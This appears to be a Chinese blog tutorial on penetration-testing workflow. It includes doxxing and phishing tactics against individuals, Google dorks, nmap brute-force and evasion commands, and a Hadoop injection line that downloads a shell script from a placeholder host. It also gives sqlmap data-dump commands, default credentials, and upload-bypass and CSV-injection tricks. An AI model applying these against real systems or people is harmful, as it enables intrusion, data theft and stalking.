2024年渗透测试流程-全(仅供学习，知识分享)_渗透测试教程(1)，2024年最新还在等机会

最新推荐文章于 2025-03-22 15:02:56 发布

2401_84563080

最新推荐文章于 2025-03-22 15:02:56 发布

阅读量2k

点赞数 22

分类专栏：程序员文章标签：学习

本文链接：https://blog.youkuaiyun.com/2401_84563080/article/details/138508283

版权

程序员专栏收录该内容

187 篇文章

订阅专栏

本文详细介绍了2024年的渗透测试流程，包括OSINT公开情报收集、主动探测、漏洞挖掘等多个阶段。在OSINT部分，讲述了社工技巧、搜索引擎利用以及浏览器插件的应用。在主动探测中，讨论了如何进行端口扫描、服务识别和漏洞利用。此外，还提到了常用的漏洞扫描工具如Nikto、AWVS、NESSUS和Xray，并给出了SQL注入、XSS、文件上传等漏洞的挖掘方法。最后，文章强调了知识体系化的重要性，并邀请读者加入技术交流圈子共同进步。

摘要生成于 C知道，由 DeepSeek-R1 满血版支持，前往体验 >

既有适合小白学习的零基础资料，也有适合3年以上经验的小伙伴深入学习提升的进阶课程，涵盖了95%以上软件测试知识点，真正体系化！

由于文件比较多，这里只是将部分目录截图出来，全套包含大厂面经、学习笔记、源码讲义、实战项目、大纲路线、讲解视频，并且后续会持续更新

需要这份系统化的资料的朋友，可以戳这里获取

https://github.com/ring04h/weakfilescan

1.2 OSINT 公开情报收集

社工技巧

查看注册的网站：
知道账号去已注册的网站找回密码，可以看到打码后的用户名、邮箱、真实姓名等信息，如果运气好没准能从数据包或html中找到未被打码的信息
可以从这些方面判断用户是否注册过
找回密码:
输入账号，如果进入下一步了则该账号存在
登录
输入账号和密码，如果提示密码错误，则表示该用户已存在
注册
填写账号时一般网站会去检测该账号是否已存在，如果已存在则会提示不可重复注册 　　　　
知道QQ通过QQ邮箱和QQ号搜索支付宝、淘宝账号等其他可能的常用平台去腾讯\新浪微博搜索
通过微信搜索
查看QQ空间\相册\地区\星座\生日\昵称(后续构建字典以及跨平台搜集)
通过说说、留言、日志找到其好友,加QQ钓鱼\共同好友\可能认识的人
知道手机号
搜索QQ、微信、钉钉等社交账号
在比较火的一些APP和网站上注册或忘记密码来判断是否注册过账号
查询支付宝、QQ交易账号，尝试输入常见姓氏获取名字(转账到该手机号,会提示输入姓氏验证)
通过对方的职业、兴趣找到该领域知名度较高的社交网站反查
根据在QQ空间、朋友圈等动态用百度识图识别照片
在微博、ins、Twitter、fb、百度贴吧搜索相近关键字，按地域、年龄、男女、用户名等筛选
留意社交动态
发布时间线
使用什么客户端 iPhone Android还是浏览器
针对客户端预先制定exploit
注意每一条链接 / 图片 / 视频链接可能包含用户ID
图片可能包含水印，exif可能会有GPS定位和手机类型,图片内容特征
视频也有可能有水印暴露社交账号ID,拍摄地点
从最早发布的动态看起，会有很大收获

一般得到一个账号的密码就相当于得到了其他账号的密码
一般人不同账号的用户名都是相同或相近的
一般人的社交账号头像用的都是一样的
尝试破解社保、公积金账号、身份证号（出生地、生日、星座、派出所代码）

虫部落快搜之文件搜索:https://search.chongbuluo.com/
qq群、群文件、贴吧论坛、目标自用论坛等社交平台
钓鱼和信息泄露(爬邮箱等信息)
电子邮件伪造、网络钓鱼
下载恶意程序
输入敏感信息
大部分信息可以用来生成密码字典
对人：说服对方达成一致、恐吓对方（敏感词、漏洞、病毒、权威机构名称、），钓鱼获取信息

1.3搜索引擎OSINT

Google Hacking(baidu\bing\souhu\github)
GoogleHacking常用语法

1、intext：（仅针对Google有效）把网页中的正文内容中的某个字符作为搜索的条件
2、intitle：把网页标题中的某个字符作为搜索的条件
3、cache：搜索搜索引擎里关于某些内容的缓存，可能会在过期内容中发现有价值的信息
4、filetype/ext：指定一个格式类型的文件作为搜索对象
5、inurl：搜索包含指定字符的URL
6、site：在指定的(域名)站点搜索相关内容

GoogleHacking其他语法

1、引号 ” ” 把关键字打上引号后，把引号部分作为整体来搜索
2、or 同时搜索两个或更多的关键字
3、link 搜索某个网站的链接 link:baidu.com即返回所有和baidu做了链接的URL
4、info 查找指定站点的一些基本信息

GoogleHackingDatabase:
google-hacking-databaseGoogleHacking典型用法(特定资产的万能密码也要积累)

管理后台地址
site:target.com intext:管理 | 后台 | 后台管理 | 登陆 | 登录 | 用户名 | 密码 | 系统 | 账号 | login | systemsite:target.com inurl:login | inurl:admin | inurl:manage | inurl:manager | inurl:admin_login | inurl:system | inurl:backendsite:target.com intitle:管理 | 后台 | 后台管理 | 登陆 | 登录
上传类漏洞地址
site:target.com inurl:filesite:target.com inurl:upload
注入页面
site:target.com inurl:php?id=（批量注入工具、结合搜索引擎）
编辑器页面
site:target.com inurl:ewebeditor
目录遍历漏洞
site:target.com intitle:index.of
SQL错误
site:target.com intext:“sql syntax near” | intext:“syntax error has occurred” | intext:“incorrect syntax near” | intext:“unexpected end of SQL command” | intext:“Warning: mysql_connect()” | intext:”Warning: mysql_query()" | intext:”Warning: pg_connect()"
phpinfo()
site:target.com ext:php intitle:phpinfo “published by the PHP Group”
配置文件泄露
site:target.com ext:.xml | .conf | .cnf | .reg | .inf | .rdp | .cfg | .txt | .ora | .ini
数据库文件泄露
site:target.com ext:.sql | .dbf | .mdb | .db 　　日志文件泄露site:target.com ext:.log
备份和历史文件泄露
site:target.com ext:.bkf | .bkp | .old | .backup | .bak | .swp | .rar | .txt | .zip | .7z | .sql | .tar.gz | .tgz | .tar
公开文件泄露
site:target.com filetype:.doc | .docx | .xls | .xlsx | .ppt | .pptx | .odt | .pdf | .rtf | .sxw | .psw | .csv
邮箱信息
site:target.com intext:@target.comsite:target.com 邮件site:target.com email
社工信息
site:target.com intitle:账号 | 密码 | 工号 | 学号 | 身份证

1.4浏览器实用插件：

Wappalyzer：识别网站使用的中间件及其版本，再去漏洞库和搜索引擎找公开披露的漏洞
SwitchOmega：快捷切换代理
shodan：识别开放端口，主机服务等（被动信息搜集）
hacktools:综合插件,很强大
firefox渗透便携版version48,工具集成很多
注意：根据获得服务、中间件信息、编辑器版本、数据库等OSINT去各大漏洞库、搜索引擎找漏洞利用

1.5 乌云和cnvd

乌云库\乌云镜像\GHDB\CNVD等公开漏洞库

2 主动探测

从管理员和用户的角度了解整个WEB应用乃至整个目标的全貌，主动探测会暴露ip以及留下日志信息，所以要…

2.1.主动扫描

1.常见服务漏洞
nmap的功能:
脚本扫描，隐蔽扫描，端口扫描，服务识别，OS识别，探测WAF
nmap脚本主要分为以下几类，在扫描时可根据需要设置
–script=类别这种方式进行比较笼统的扫描：
–auth: 负责处理鉴权证书（绕开鉴权）的脚本
–broadcast: 在局域网内探查更多服务开启状况，如dhcp/dns/sqlserver等服务
–brute: 提供暴力破解方式，针对常见的应用如http/snmp等
–default: 使用-sC或-A选项扫描时候默认的脚本，提供基本脚本扫描能力
–discovery: 对网络进行更多的信息，如SMB枚举、SNMP查询等
–dos: 用于进行拒绝服务攻击
–exploit: 利用已知的漏洞入侵系统
–external: 利用第三方的数据库或资源，例如进行whois解析
–fuzzer: 模糊测试的脚本，发送异常的包到目标机，探测出潜在漏洞
–intrusive: 入侵性的脚本，此类脚本可能引发对方的IDS/IPS的记录或屏蔽
–malware: 探测目标机是否感染了病毒、开启了后门等信息
–safe: 此类与intrusive相反，属于安全性脚本
–version: 负责增强服务与版本扫描（Version Detection）功能的脚本
–vuln: 负责检查目标机是否有常见的漏洞（Vulnerability），如是否有MS08_067
–script=auth 192.168.137.*负责处理鉴权证书（绕开鉴权）的脚本,也可以作为检测部分应用弱口令nmap
–script=brute 192.168.137.提供暴力破解的方式可对数据库，smb，snmp等进行简单密码的暴力猜解nmap
–script=default192.168.137. 或者 nmap -sC 192.168.137.*默认的脚本扫描，主要是搜集各种应用服务的信息，收集到后，可再针对具体服务进行攻击nmap
–script=vuln 192.168.137.*检查是否存在常见漏洞nmap -n -p445
–script=broadcast 192.168.137.4在局域网内探查更多服务开启状况nmap
–script external 202.103.243.110利用第三方的数据库或资源，例如进行whois解析
–script banner ipnmap -p port -sV ip获取软件版本信息
nmap -O ip操作系统信息，版本
nmap -A -v ip完整信息获取-sN;-sF;-sX 隐蔽扫描　　
-sN是Null扫描,是通过发送非常规的TCP通信数据包进行探测　　
nmap -sN 127.0.0.1　　
-sF是FIN扫描,当我们使用TCP SYN扫描时可能会被目标主机的防火墙发现,会阻止SYN数据包,这时我们使用TCP FIN扫描方式会有很好的穿透效果.　　
nmap -sF 127.0.0.1扫描前1000号TCP端口
nmap 192.168.100.2Ping扫描8个本地主机(按ARP、ICMP、TCP 80的顺序)
nmap –sP 192.168.100.0-7扫描80,443端口
nmap -p 80,443192.168.100.2扫描前1000号TCP端口，OS指纹，服务，然后运行一个NSE脚本
sudo nmap -A 192.168.100.2扫描全部65535个TCP端口，OS指纹，服务，然后运行一个NSE脚本sudo nmap –A –p- 192.168.100.2扫描前1000号UDP端口sudo nmap -sU 192.168.100.2扫描所有65535个UDP端口
sudo nmap -sU –p- 192.168.100.2扫描所有65535个UDP端口，并获取服务、OS指纹，之后运行一些NSE脚本
sudo nmap –sU -p- -A 192.168.100.2

2.2 常见端口漏洞利用

快速扫描：　　
Masscan-p80,800 ip --rate=1000021/ FTP　　
匿名/暴力破解　　
拒绝服务22/ SSH　　
暴力破解23/ telnet　　Winbox(CVE-2018-14847)https://github.com/BasuCert/WinboxPoC　　
弱口令 / 暴力破解161/ snmp　　
弱口令　　https://blog.youkuaiyun.com/archersaber39/article/details/78932252389/ ladp　　匿名访问　　https://www.cnblogs.com/persuit/p/5706432.html　　
ladp注入　　http://www.4hou.com/technology/9090.html　　https://www.freebuf.com/articles/web/149059.html443/ ssl　　
openssl心脏出血　　https://paper.seebug.org/437/　　http://www.anquan.us/static/drops/papers-1381.html　　https://www.freebuf.com/sectool/33191.html445/ smb　　
win10拒绝服务　　永恒之蓝RCE875/ rsync　　匿名访问　　http://www.anquan.us/static/bugs/wooyun-2016-0190815.html　　https://paper.seebug.org/409/　　http://www.91ri.org/11093.html1433/ mssql　　暴力破解　　http://www.anquan.us/static/drops/tips-12749.　　html　　https://www.seebug.org/appdir/Microsoft%20SQL%20Server1521/ oracle　　暴力破解　　https://www.exploit-db.com/exploits/330842601/ zebra　　http://www.anquan.us/static/bugs/wooyun-2013-047409.html3128/ squid3306/ mysql　　RCE　　http://www.91ri.org/17511.html　　CVE-2015-0411　　hash破解　　https://www.freebuf.com/column/153561.html　　waf绕过　　https://www.freebuf.com/articles/web/155570.html　　general_log_file getshell　　https://www.freebuf.com/column/143125.html　　提权　　http://www.91ri.org/16540.html3312/ kangle　　getshell　　https://www.secpulse.com/archives/23927.html3389/ rdp　　shift 放大镜输入法绕过 guest用户　　永恒之蓝(ESTEEMAUDIT)　　https://www.freebuf.com/articles/system/132171.html　　https://www.anquanke.com/post/id/86328　　ms12-020　　https://blog.youkuaiyun.com/meyo_leo/article/details/779505524440/ rundeck　　https://www.secpulse.com/archives/29500.html4848/ glassfish　　文件读取　　https://www.secpulse.com/archives/42277.html　　https://www.anquanke.com/post/id/85948　　GlassFish2/ admin:admin GlassFish3,4/ 如果管理员不设置帐号本地会自动登录,远程访问会提示配置错误5432/ PostgreSQL　　RCE　　https://www.cnblogs.com/KevinGeorge/p/8521496.html　　https://www.secpulse.com/archives/69153.html　　默认账号postgres　　参考　　http://www.91ri.org/13070.html　　http://www.91ri.org/6507.html5672,15672,4369,25672/ RabbitMQ　　（guest/guest）5900/ VNC　　https://www.seebug.org/appdir/RealVNC5984/ CouchDB　　http://xxx:5984/_utils/6082/ varnish　　CLI 未授权　　https://www.secpulse.com/archives/10681.html6379/ redis　　Redis未授权　　　ssh publickey　　　crontab　　　webshell　　　反序列化　　　开机自启文件夹写bat　　　
参考　　　https://www.freebuf.com/column/170710.html7001,7002/ WebLogic　　默认弱口令　　weblogic/weblogic ,weblogic/welcom ,weblogic/welcom1,weblogic1/weblogic　　反序列　　CVE-2018-2628　　https://www.freebuf.com/articles/web/169770.html　　https://www.seebug.org/appdir/WebLogic9200,9300/ elasticsearch　　CVE-2015-1427　　http://www.anquan.us/static/drops/papers-5142.html　　CVE-2018-17246　　https://www.seebug.org/vuldb/ssvid-97730　　参考　　https://www.seebug.org/search/?keywords=elasticsearch9000/ fcgi　　https://paper.seebug.org/289/9043/ WebSphere　　Websphere8.5　　https://localhost:9043/ibm/console/logon.jsp　　Websphere6-7　　http://localhost:9043/ibm/console　　后台未授权，登录后可部署WAR包　　SOAP服务有反序列化　　弱口令：admin / password11211/ memcache　　未授权　　UDP反射　　https://shockerli.net/post/memcached-udp-reflection-attack-bug/27017,27018/ Mongodb　　未授权　　注入　　https://www.anquanke.com/post/id/83763　　phpMoAdmin RCE　　https://www.aqniu.com/threat-alert/6978.html50000/ SAP　　 SAP命令执行　　https://www.secpulse.com/archives/20204.html50070,50030/ hadoop　　未授权　　https://www.freebuf.com/vuls/173638.html　　命令执行　　host:50060/pstack?pid=123|wget http://somehost/shell.sh　　https://www.seebug.org/search/?keywords=hadoop　　
其他　　http://www.91ri.org/15441.html’’’

2.3WAF及bypass

探测WAF
Nmap探测WAF有两种脚本，
一种是http-waf-detect，一种是http-waf-fingerprint。
nmap -p port --script=http-waf-detect ip
wafw00f -a example.com
sqlmap-u “http://www.vxxxx.org/ex.php?id=1” --identify-waf
bypass: 手工注入，详见笔记

2.4目录、后台和敏感路径文件扫描

1.御剑目录（土司专版，笔记里有）、后台扫描（图片属性地址暴露），
完善目录和账密字典方法：
基础字典包合并去重
　　dymerge.py -u
　　python pydictor.py -tool uniqbiner /my/dict/dirpath --output uniq.txt
　　python pydictor.py -tool uniqifer /tmp/dicts.txt --output /tmp/uniq.txt
2.人工浏览\逐个请求burp
非常重要,有必要手动去浏览每个页面，点击页面上每一个跳转，这样在Burp的sitemap里面就可以出现这些请求和响应。
图片后台地址\图片后面的信息
跳转参数\奇怪的参数
泄露邮箱等社工信息
业务逻辑\架构
3.自动化
xxxxx

3 漏洞挖掘

3.1漏洞扫描工具

注意:登录类网站扫描要带cookies扫才能扫到
3.1.1Nikto Web服务漏洞扫描器
Tips:利用-Format选项来导出特定格式的扫描结果，使扫描结果更容易阅读和分析。
nikto -host http://example.com -output ~/nikto.html -Format html
NIKTO使用方法：

1、命令：nikto -update #升级，更新插件；
2、Nikto-list-plugins #查看插件；
3、Nikto-host http://1.1.1.1 #扫描目标：域名方式；
4、Nikto-host http://1.1.1.1 -output #扫描并输出结果
5、Nikto-host 1.1.1.1-port 80#扫描目标：ip地址加端口号
6、Nikto-host www.baidu.com -port 443-ssl #扫描https网站
7、Nikto-host 文件名.txt #批量扫描目标
8、nmap -p80 192.168.1.0/24-oG - | nikto -host - #利用nmap扫描开放80端口的IP段并且oG（nmap结果输出并整理）通过管道的方式“|”用nikto进行扫描
9、nikto -host 192.168.0.1-useproxy http://localhost:8070 #利用代理进行扫描10、-vhost #当一个网站存在多个端口时可以使用-vhost遍历所有网站进行扫描或一个ip对应多个网站
11、Nikto交互形参数配置文件：路径：/etc/nikto.confUserAgent中文名为用户代理，简称 UA，它是一个特殊字符串头，使得服务器能够识别客户使用的操作系统及版本；在nikto中最好修改成别的浏览器user agent；设置cookie：在配置文件中找到cookie进行设置（#STATIC-COOKIE= “cookie1”=“cookie value”;“cookie2”=“cookie val”）IDS逃避技术：主要为了躲避IDS、IPS检测告警-evasion #此参数使用方式（Nikto -host http://1.1.1.1 -evasion 1234）

逃避方式共8种：

1、随机url编码
2、自选路径
3、过早结束的URL
4、优先考虑长随机字符串
5、参数欺骗
6、使用TAB作为命令的分隔符，
7、使用变化的URL
8、使用Windows路径分隔符
1.2AWVS漏扫
这个没什么好说的，破解版到处都是。

3.1.2NESSUS
实时更新插件的漏扫，很好用，就是激活流程麻烦。
https://www.wuyini.cn/765.html
3.1.2Xray自动化的漏洞挖掘
burp+xray：
BurpSuite + Xray 被动扫描配置 - Ritte - 博客园
或者直接挂浏览器，点到哪里，扫到哪里
xray+各种漏扫联动
3.1.4Fuzz
Fuzz可以发现应用程序中没有被引用但是确实是可以访问的页面。
Discover Content是Burp中专门用于此目的的工具。
Burp Intruder也可以通过字典攻击来实施强制浏览(通常是在url参数和文件路径部分进行修改)，爆破、注入等。
FuzzDB包含一些用于此目的的非常牛逼的字典。

3.2.挖掘漏洞

3.2.1SQL注入：
初步测试：见框就上，加’ " ) ))% and 1=1 and 1=2　and2-1 or ，
抓包爆破常用SQL注入payload字典，上burp intruder

通过搜索引擎，批量查找注入点。
然后用傀儡注入点批量搜集工具
实操案例： sql注入思路（登录界面）和网络常用端口

超级SQL注入工具（github）
sqlmap一把梭：
注意：命令为kali linux中运行的（windows中用python sqlmap.py执行）
注入六连：

1.sqlmap-u "http://www.xx.com?id=x"查询是否存在注入点
2.–dbs 检测站点包含哪些数据库
3.–current-db 获取当前的数据库名
4.–tables -D "db_name"获取指定数据库中的表名 -D后接指定的数据库名称
5.–columns -T “table_name”-D "db_name"获取数据库表中的字段
6.–dump-C “columns_name”-T “table_name”-D "db_name"获取字段的数据内容

COOKIE注入：

sqlmap -u “http://www.xx.com/xxx.asp”–cookie “id=XXX cookie”–level2＼cookie

注入后接cookie值POST注入：

（1）目标地址http:// www.xxx.com /login.asp
（2）打开burp代理
（3）点击表单提交
（4）burp获取拦截信息（post）
（5）右键保存文件（.txt）到指定目录下
（6）运行sqlmap并执行如下命令：用例：sqlmap -r okay.txt -p username// -r表示加载文件(及步骤（5）保存的路径)-p指定参数（即拦截的post请求中表单提交的用户名或密码等name参数）
（7）自动获取表单：–forms自动获取表单例如：sqlmap -u www.xx.com/login.asp --forms
（8）指定参数搜索：–data例如:sqlmap -u www.xx.com/login.asp --data “username=1”

常用指令：

1.–purge 【重新扫描（–purge 删除原先对该目标扫描的记录）
2.–tables 【获取表名
3.–dbs 【检测站点包含哪些数据库
4.–current-db 【获取当前的数据库名
5.–current-user 【检测当前用户
6.–is-dba 【判断站点的当前用户是否为数据库管理员
7.–batch 【默认确认，不询问你是否输入
8.–search 【后面跟参数 -D -T -C 搜索列（C），表（T）和或数据库名称（D）
9.–threads 10【线程，sqlmap线程最高设置为10
10.–level 3【sqlmap默认测试所有的GET和POST参数，当–level的值大于等于2的时候也会测试HTTP Cookie头的值，当大于等于3的时候也会测试User-Agent和HTTP Referer头的值。最高为5
11.–risk 3【执行测试的风险（0-3，默认为1）risk越高，越慢但是越安全
12.-v 【详细的等级(0-6)

0：只显示Python的回溯，错误和关键消息。
1：显示信息和警告消息。
2：显示调试消息。
3：有效载荷注入。
4：显示HTTP请求。
5：显示HTTP响应头。
6：显示HTTP响应页面的内容

13.–privileges 【查看权限
14.–tamper xx.py,cc.py 【防火墙绕过，后接tamper库中的py文件
15.–method “POST”–data “page=1&id=2”【POST方式提交数据
16.–threads number　　【采用多线程后接线程数
17.–referer “”【使用referer欺骗
18.–user-agent “”【自定义user-agent
19.–proxy “目标地址″ 【使用代理注入sqlmap常用路径：1.添加表字段的目录在/usr/share/sqlmap/txt/common-tables.txt2.存放扫描记录的目录在/root/.sqlmap/output高阶玩法：自己写tamper.py

3.2.2XSS：

xss漏洞原理分析与挖掘方法 - 知乎
https://zhuanlan.zhihu.com/p/35315167
web漏洞 | XSS（跨站攻击脚本）详解
https://www.cnblogs.com/wuqun/p/12484816.html
XSS汇总
http://www.nxadmin.com/penetration/810.html
XSS小结 - 先知社区
https://xz.aliyun.com/t/2936
2020跨站点脚本[xss]速查表|雨苁
https://www.yuque.com/xiaogege-yxttw/btpqqg/lwzwei
XSSer自动化工具
https://www.freebuf.com/sectool/173228.html
XSStrike 自动化绕过WAF
https://www.uedbox.com/post/56316/
客服对话系统上XSS打cookie

3.2.3文件上传
字典生成 https://github.com/c0ny1/upload-fuzz-dic-builder 　　
　
目录穿越
上传后如果没有被文件重命名，可以在文件名值做目录跳转
注意一些像目录的参数名
dir　path　location　url
文件头绕过
修改上传类型 Content-Type
双文件上传 　　
截断
长文件名长Content-Disposition%00截断
特殊文件
svg / html / htm / swfxsspdfchrome 里可以跳转cer / asa / spx / php5 / phtml
可能会被当做动态语言解析
.htaccess / .user.ini / web.config / web.xml
修改解析规则
.xls / .xlsx
POI Excel XXE
.tar / .tar.gz / .zip
可能存在文件释放目录跳转问题
.pkl
python反序列化文件
.xml
可能有 XXE
.yaml / .yml
YAML 反序列化
.jar / .class
上传到 java classpath 的目录下，类被加载时执行代码
无大小和次数限制
无限上传制造垃圾数据堵死硬盘
有图片加工的地方可以注意一下imagemagick命令执行
文件读取
读取系统敏感文件
文件包含
可读取文件或代码执行
文件删除
删除配置文件可破坏网站删除安装锁可重装
文件解压
如果上传文件为 tar / tar.gz 类型，可以尝试构压缩包内文件名为…/…/…/…/xxx 的tar包
文件导出
如果是CSV 或者 Excel可以注意一下CSV注入 =2222-1 -1+1=2222-1 @=2222-1 \r\n=2222-1 111,=2222-1,
3.2.4命令执行
命令注入
–xxxx 参数注入| 和 | | 与符号& 和 && 与符号; 分号${}
代码执行
表达式freemarkerOGNLSpeljsel
非表达式（php）
evalassertcall_user_func() / call_user_func_array()preg_replace()create_function()array_map()array_filter()usort() / uasort()
反序列化
php 源文件拼接写java反序列化远程 jar 加载反射机制jsp 源文件拼接写入
3.2.5弱口令及字典破解
后台弱口令爆破撞库
（尝试万能密码、特定资产常用密码、弱口令后再撞库、有的数据库要输对用户名再注释